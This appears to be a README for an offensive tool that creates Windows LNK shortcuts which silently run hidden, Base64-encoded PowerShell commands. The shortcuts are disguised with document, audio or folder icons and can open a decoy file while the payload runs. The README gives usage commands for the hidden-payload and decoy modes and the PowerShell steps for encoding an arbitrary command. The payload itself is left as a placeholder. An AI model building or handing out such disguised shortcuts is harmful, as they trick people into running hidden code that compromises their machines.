Creates Windows LNK shortcuts that run hidden PowerShell commands.
- Silent execution with a decoy file.
- Uses common system icons (MP3, DOCX, XLS, TXT, Folder).
- Payload is Base64 encoded.
pip install pywin32Hidden Payload:
python -m lnkCreator -o secret.lnk -i txtWith Decoy:
python -m lnkCreator -o Report.lnk -i docx -d decoy.docxDebug:
python -m lnkCreator -o secret.lnk -i txt --debugEncode your command in PowerShell and replace the encoded_command variable in the script.
$command = 'your-command-here'
$bytes = [System.Text.Encoding]::UTF8.GetBytes($command)
[Convert]::ToBase64String($bytes)